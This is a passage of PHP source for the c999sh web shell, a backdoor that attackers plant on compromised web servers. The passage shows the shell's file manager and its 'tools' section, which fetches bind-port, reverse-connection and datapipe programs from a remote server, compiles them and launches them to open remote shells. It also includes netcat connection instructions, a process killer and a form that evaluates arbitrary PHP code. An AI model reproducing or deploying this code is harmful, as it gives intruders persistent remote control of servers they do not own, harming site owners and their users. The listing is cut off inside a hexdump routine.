  1984.    $tab["folders"] = array();
  1985.    $tab["links"] = array();
  1986.    $tab["files"] = array();
  1987.    $i = 0;
  1988.    foreach ($objects as $a)
  1989.    {
  1990.     $v = $a[0];
  1991.     $o = basename($v);
  1992.     $dir = dirname($v);
  1993.     if ($disp_fullpath) {$disppath = $v;}
  1994.     else {$disppath = $o;}
  1995.     $disppath = str2mini($disppath,60);
  1996.     if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
  1997.     elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
  1998.     foreach ($regxp_highlight as $r)
  1999.     {
  2000.      if (ereg($r[0],$o))
  2001.      {
  2002.       if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c999shexit();}
  2003.       else
  2004.       {
  2005.        $r[1] = round($r[1]);
  2006.        $isdir = is_dir($v);
  2007.        if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
  2008.        {
  2009.         if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
  2010.         $disppath = $r[2].$disppath.$r[3];
  2011.         if ($r[4]) {break;}
  2012.        }
  2013.       }
  2014.      }
  2015.     }
  2016.     $uo = urlencode($o);
  2017.     $ud = urlencode($dir);
  2018.     $uv = urlencode($v);
  2019.     $row = array();
  2020.     if ($o == ".")
  2021.     {
  2022.      $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
  2023.      $row[] = "LINK";
  2024.     }
  2025.     elseif ($o == "..")
  2026.     {
  2027.      $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
  2028.      $row[] = "LINK";
  2029.     }
  2030.     elseif (is_dir($v))
  2031.     {
  2032.      if (is_link($v))
  2033.      {
  2034.       $disppath .= " => ".readlink($v);
  2035.       $type = "LINK";
  2036.       $row[] =  "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
  2037.      }
  2038.      else
  2039.      {
  2040.       $type = "DIR";
  2041.       $row[] =  "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
  2042.       }
  2043.      $row[] = $type;
  2044.     }
  2045.     elseif(is_file($v))
  2046.     {
  2047.      $ext = explode(".",$o);
  2048.      $c = count($ext)-1;
  2049.      $ext = $ext[$c];
  2050.      $ext = strtolower($ext);
  2051.      $row[] =  "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
  2052.      $row[] = view_size($a[1]);
  2053.     }
  2054.     $row[] = date("d.m.Y H:i:s",$a[2]);
  2055.     if (!$win) {$row[] = $a[3];}
  2056.     $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
  2057.     if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
  2058.     else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
  2059.     if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;".$checkbox;}
  2060.     else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;".$checkbox;}
  2061.     if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
  2062.     elseif (is_link($v)) {$tab["links"][] = $row;}
  2063.     elseif (is_dir($v)) {$tab["folders"][] = $row;}
  2064.     elseif (is_file($v)) {$tab["files"][] = $row;}
  2065.     $i++;
  2066.    }
  2067.   }
  2068.   // Compiling table
  2069.   $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
  2070.   echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">";
  2071.   foreach($table as $row)
  2072.   {
  2073.    echo "<tr>\r\n";
  2074.    foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
  2075.    echo "</tr>\r\n";
  2076.   }
  2077.   echo "</table><hr size=\"1\" noshade><p align=\"right\">
  2078.  <script>
  2079.  function ls_setcheckboxall(status)
  2080.  {
  2081.   var id = 1;
  2082.   var num = ".(count($table)-2).";
  2083.   while (id <= num)
  2084.   {
  2085.    document.getElementById('actbox'+id).checked = status;
  2086.    id++;
  2087.   }
  2088.  }
  2089.  function ls_reverse_all()
  2090.  {
  2091.   var id = 1;
  2092.   var num = ".(count($table)-2).";
  2093.   while (id <= num)
  2094.   {
  2095.    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked;
  2096.    id++;
  2097.   }
  2098.  }
  2099.  </script>
  2100.  <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\">
  2101.  <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";
  2102.   if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
  2103.   {
  2104.    echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
  2105.   }
  2106.   echo "<select name=act><option value=\"".$act."\">With selected:</option>";
  2107.   echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
  2108.   echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
  2109.   if ($usefsbuff)
  2110.   {
  2111.    echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
  2112.    echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
  2113.    echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
  2114.   }
  2115.   echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>";
  2116.   echo "</form>";
  2117.  }
  2118. }
  2119. if ($act == "tools")
  2120. {
  2121.  $bndportsrcs = array(
  2122.   "c999sh_bindport.pl"=>array("Using PERL","perl %path %port"),
  2123.   "c999sh_bindport.c"=>array("Using C","%path %port %pass")
  2124.  );
  2125.  $bcsrcs = array(
  2126.   "c999sh_backconn.pl"=>array("Using PERL","perl %path %host %port"),
  2127.   "c999sh_backconn.c"=>array("Using C","%path %host %port")
  2128.  );
  2129.  $dpsrcs = array(
  2130.   "c999sh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"),
  2131.   "c999sh_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost")
  2132.  );
  2133.  if (!is_array($bind)) {$bind = array();}
  2134.  if (!is_array($bc)) {$bc = array();}
  2135.  if (!is_array($datapipe)) {$datapipe = array();}
  2136.  
  2137.  if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;}
  2138.  if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;}
  2139.  
  2140.  if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");}
  2141.  if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;}
  2142.  
  2143.  if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";}
  2144.  if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;}
  2145.  if (!empty($bindsubmit))
  2146.  {
  2147.   echo "<b>Result of binding port:</b><br>";
  2148.   $v = $bndportsrcs[$bind["src"]];
  2149.   if (empty($v)) {echo "Unknown file!<br>";}
  2150.   elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
  2151.   else
  2152.   {
  2153.    $w = explode(".",$bind["src"]);
  2154.    $ext = $w[count($w)-1];
  2155.    unset($w[count($w)-1]);
  2156.    $srcpath = join(".",$w).".".rand(0,999).".".$ext;
  2157.    $binpath = $tmpdir.join(".",$w).rand(0,999);
  2158.    if ($ext == "pl") {$binpath = $srcpath;}
  2159.    @unlink($srcpath);
  2160.    $fp = fopen($srcpath,"ab+");
  2161.    if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
  2162.    elseif (!$data = c999getsource($bind["src"])) {echo "Can't download sources!";}
  2163.    else
  2164.    {
  2165.     fwrite($fp,$data,strlen($data));
  2166.     fclose($fp);
  2167.     if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath);  @unlink($srcpath);}
  2168.     $v[1] = str_replace("%path",$binpath,$v[1]);
  2169.     $v[1] = str_replace("%port",$bind["port"],$v[1]);
  2170.     $v[1] = str_replace("%pass",$bind["pass"],$v[1]);
  2171.     $v[1] = str_replace("//","/",$v[1]);
  2172.     $retbind = myshellexec($v[1]." > /dev/null &");
  2173.     sleep(5);
  2174.     $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5);
  2175.     if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";}
  2176.     else {echo "Binding... ok! Connect to <b>".getenv("SERVER_ADDR").":".$bind["port"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View binder's process</u></a></center>";}
  2177.    }
  2178.    echo "<br>";
  2179.   }
  2180.  }
  2181.  if (!empty($bcsubmit))
  2182.  {
  2183.   echo "<b>Result of back connection:</b><br>";
  2184.   $v = $bcsrcs[$bc["src"]];
  2185.   if (empty($v)) {echo "Unknown file!<br>";}
  2186.   else
  2187.   {
  2188.    $w = explode(".",$bc["src"]);
  2189.    $ext = $w[count($w)-1];
  2190.    unset($w[count($w)-1]);
  2191.    $srcpath = join(".",$w).".".rand(0,999).".".$ext;
  2192.    $binpath = $tmpdir.join(".",$w).rand(0,999);
  2193.    if ($ext == "pl") {$binpath = $srcpath;}
  2194.    @unlink($srcpath);
  2195.    $fp = fopen($srcpath,"ab+");
  2196.    if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
  2197.    elseif (!$data = c999getsource($bc["src"])) {echo "Can't download sources!";}
  2198.    else
  2199.    {
  2200.     fwrite($fp,$data,strlen($data));
  2201.     fclose($fp);
  2202.     if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
  2203.     $v[1] = str_replace("%path",$binpath,$v[1]);
  2204.     $v[1] = str_replace("%host",$bc["host"],$v[1]);
  2205.     $v[1] = str_replace("%port",$bc["port"],$v[1]);
  2206.     $v[1] = str_replace("//","/",$v[1]);
  2207.     $retbind = myshellexec($v[1]." > /dev/null &");
  2208.     echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...<br>";
  2209.    }
  2210.   }
  2211.  }
  2212.  if (!empty($dpsubmit))
  2213.  {
  2214.   echo "<b>Result of datapipe-running:</b><br>";
  2215.   $v = $dpsrcs[$datapipe["src"]];
  2216.   if (empty($v)) {echo "Unknown file!<br>";}
  2217.   elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
  2218.   else
  2219.   {
  2220.    $srcpath = $tmpdir.$datapipe["src"];
  2221.    $w = explode(".",$datapipe["src"]);
  2222.    $ext = $w[count($w)-1];
  2223.    unset($w[count($w)-1]);
  2224.    $srcpath = join(".",$w).".".rand(0,999).".".$ext;
  2225.    $binpath = $tmpdir.join(".",$w).rand(0,999);
  2226.    if ($ext == "pl") {$binpath = $srcpath;}
  2227.    @unlink($srcpath);
  2228.    $fp = fopen($srcpath,"ab+");
  2229.    if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
  2230.    elseif (!$data = c999getsource($datapipe["src"])) {echo "Can't download sources!";}
  2231.    else
  2232.    {
  2233.     fwrite($fp,$data,strlen($data));
  2234.     fclose($fp);
  2235.     if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
  2236.     list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]);
  2237.     $v[1] = str_replace("%path",$binpath,$v[1]);
  2238.     $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]);
  2239.     $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]);
  2240.     $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]);
  2241.     $v[1] = str_replace("//","/",$v[1]);
  2242.     $retbind = myshellexec($v[1]." > /dev/null &");
  2243.     sleep(5);
  2244.     $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5);
  2245.     if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";}
  2246.     else {echo "Running datapipe... ok! Connect to <b>".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View datapipe process</u></a></center>";}
  2247.    }
  2248.    echo "<br>";
  2249.   }
  2250.  }
  2251.  ?><b>Binding port:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">Port: <input type=text name="bind[port]" value="<?php echo htmlspecialchars($bind["port"]); ?>">&nbsp;Password: <input type=text name="bind[pass]" value="<?php echo htmlspecialchars($bind["pass"]); ?>">&nbsp;<select name="bind[src]"><?php
  2252.  foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
  2253.  ?></select>&nbsp;<input type=submit name=bindsubmit value="Bind"></form>
  2254. <b>Back connection:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="bc[host]" value="<?php echo htmlspecialchars($bc["host"]); ?>">&nbsp;Port: <input type=text name="bc[port]" value="<?php echo htmlspecialchars($bc["port"]); ?>">&nbsp;<select name="bc[src]"><?php
  2255. foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
  2256. ?></select>&nbsp;<input type=submit name=bcsubmit value="Connect"></form>
  2257. Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br>
  2258. <b>Datapipe:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="datapipe[remoteaddr]" value="<?php echo htmlspecialchars($datapipe["remoteaddr"]); ?>">&nbsp;Local port: <input type=text name="datapipe[localport]" value="<?php echo htmlspecialchars($datapipe["localport"]); ?>">&nbsp;<select name="datapipe[src]"><?php
  2259. foreach($dpsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
  2260. ?></select>&nbsp;<input type=submit name=dpsubmit value="Run"></form><b>Note:</b> sources will be downloaded from remote server.<?php
  2261. }
  2262. if ($act == "processes")
  2263. {
  2264.  echo "<b>Processes:</b><br>";
  2265.  if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");}
  2266.  else {$handler = "tasklist";}
  2267.  $ret = myshellexec($handler);
  2268.  if (!$ret) {echo "Can't execute \"".$handler."\"!";}
  2269.  else
  2270.  {
  2271.   if (empty($processes_sort)) {$processes_sort = $sort_default;}
  2272.   $parsesort = parsesort($processes_sort);
  2273.   if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
  2274.   $k = $parsesort[0];
  2275.   if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
  2276.   else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
  2277.   $ret = htmlspecialchars($ret);
  2278.   if (!$win)
  2279.   {
  2280.    if ($pid)
  2281.    {
  2282.     if (is_null($sig)) {$sig = 9;}
  2283.     echo "Sending signal ".$sig." to #".$pid."... ";
  2284.     if (posix_kill($pid,$sig)) {echo "OK.";}
  2285.     else {echo "ERROR.";}
  2286.    }
  2287.    while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
  2288.    $stack = explode("\n",$ret);
  2289.    $head = explode(" ",$stack[0]);
  2290.    unset($stack[0]);
  2291.    for($i=0;$i<count($head);$i++)
  2292.    {
  2293.     if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}
  2294.    }
  2295.    $prcs = array();
  2296.    foreach ($stack as $line)
  2297.    {
  2298.     if (!empty($line))
  2299. {
  2300.  echo "<tr>";
  2301.      $line = explode(" ",$line);
  2302.      $line[10] = join(" ",array_slice($line,10));
  2303.      $line = array_slice($line,0,11);
  2304.      if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
  2305.      $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
  2306.      $prcs[] = $line;
  2307.      echo "</tr>";
  2308.     }
  2309.    }
  2310.   }
  2311.   else
  2312.   {
  2313.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  2314.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  2315.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  2316.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  2317.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  2318.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  2319.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  2320.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  2321.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  2322.    while (ereg("",$ret)) {$ret = str_replace("","",$ret);}
  2323.    while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  2324.    $ret = convert_cyr_string($ret,"d","w");
  2325.    $stack = explode("\n",$ret);
  2326.    unset($stack[0],$stack[2]);
  2327.    $stack = array_values($stack);
  2328.    $head = explode("",$stack[0]);
  2329.    $head[1] = explode(" ",$head[1]);
  2330.    $head[1] = $head[1][0];
  2331.    $stack = array_slice($stack,1);
  2332.    unset($head[2]);
  2333.    $head = array_values($head);
  2334.    if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
  2335.    else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
  2336.    if ($k > count($head)) {$k = count($head)-1;}
  2337.    for($i=0;$i<count($head);$i++)
  2338.    {
  2339.     if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";}
  2340.    }
  2341.    $prcs = array();
  2342.    foreach ($stack as $line)
  2343.    {
  2344.     if (!empty($line))
  2345.     {
  2346.      echo "<tr>";
  2347.      $line = explode("",$line);
  2348.      $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
  2349.      $line[2] = intval(str_replace(" ","",$line[2]))*1024;
  2350.      $prcs[] = $line;
  2351.      echo "</tr>";
  2352.     }
  2353.    }
  2354.   }
  2355.   $head[$k] = "<b>".$head[$k]."</b>".$y;
  2356.   $v = $processes_sort[0];
  2357.   usort($prcs,"tabsort");
  2358.   if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
  2359.   $tab = array();
  2360.   $tab[] = $head;
  2361.   $tab = array_merge($tab,$prcs);
  2362.   echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
  2363.   foreach($tab as $i=>$k)
  2364.   {
  2365.    echo "<tr>";
  2366.    foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
  2367.    echo "</tr>";
  2368.   }
  2369.   echo "</table>";
  2370.  }
  2371. }
  2372. if ($act == "eval")
  2373. {
  2374.  if (!empty($eval))
  2375.  {
  2376.   echo "<b>Result of execution this PHP-code</b>:<br>";
  2377.   $tmp = ob_get_contents();
  2378.   $olddir = realpath(".");
  2379.   @chdir($d);
  2380.   if ($tmp)
  2381.   {
  2382.    ob_clean();
  2383.    eval($eval);
  2384.    $ret = ob_get_contents();
  2385.    $ret = convert_cyr_string($ret,"d","w");
  2386.    ob_clean();
  2387.    echo $tmp;
  2388.    if ($eval_txt)
  2389.    {
  2390.     $rows = count(explode("\r\n",$ret))+1;
  2391.     if ($rows < 10) {$rows = 10;}
  2392.     echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
  2393.    }
  2394.    else {echo $ret."<br>";}
  2395.   }
  2396.   else
  2397.   {
  2398.    if ($eval_txt)
  2399.    {
  2400.     echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
  2401.     eval($eval);
  2402.     echo "</textarea>";
  2403.    }
  2404.    else {echo $ret;}
  2405.   }
  2406.   @chdir($olddir);
  2407.  }
  2408.  else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
  2409.  echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
  2410. }
  2411. if ($act == "f")
  2412. {
  2413.  if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
  2414.  {
  2415.   if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
  2416.   else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
  2417.  }
  2418.  else
  2419.  {
  2420.   $r = @file_get_contents($d.$f);
  2421.   $ext = explode(".",$f);
  2422.   $c = count($ext)-1;
  2423.   $ext = $ext[$c];
  2424.   $ext = strtolower($ext);
  2425.   $rft = "";
  2426.   foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
  2427.   if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
  2428.   if (empty($ft)) {$ft = $rft;}
  2429.   $arr = array(
  2430.    array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
  2431.    array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
  2432.    array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
  2433.    array("Code","code"),
  2434.    array("Session","phpsess"),
  2435.    array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
  2436.    array("SDB","sdb"),
  2437.    array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
  2438.    array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
  2439.    array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
  2440.    array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
  2441.    array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
  2442.   );
  2443.   echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
  2444.   foreach($arr as $t)
  2445.   {
  2446.    if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
  2447.    elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
  2448.    else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
  2449.    echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
  2450.   }
  2451.   echo "<hr size=\"1\" noshade>";
  2452.   if ($ft == "info")
  2453.   {
  2454.    echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
  2455.    if (!$win)
  2456.    {
  2457.     echo "<tr><td><b>Owner/Group</b></td><td> ";    
  2458.     $ow = posix_getpwuid(fileowner($d.$f));
  2459.     $gr = posix_getgrgid(filegroup($d.$f));
  2460.     echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
  2461.    }
  2462.    echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
  2463.    $fi = fopen($d.$f,"rb");
  2464.    if ($fi)
  2465.    {
  2466.     if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
  2467.     else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
  2468.     $n = 0;
  2469.     $a0 = "00000000<br>";
  2470.     $a1 = "";
  2471.     $a2 = "";
  2472.     for ($i=0; $i<strlen($str); $i++)
  2473.     {
  2474.      $a1 .= sprintf("%02X",ord($str[$i]))." ";
  2475.      switch (ord($str[$i]))
  2476.      {
  2477.       case 0:  $a2 .= "<font>0</font>"; break;
  2478.       case 32:
  2479.       case 10:
  2480.       case 13: $a2 .= "&nbsp;"; break;
  2481.       default: $a2 .= htmlspecialchars($str[$i]);
  2482.      }
  2483.      $n++;
  2484.      if ($n == $hexdump_rows)
  2485.      {
  2486.       $n = 0;
  2487.       if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
  2488.       $a1 .= "<br>";
  2489.       $a2 .= "<br>";
  2490.      }
  2491.     }
  2492.     //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}
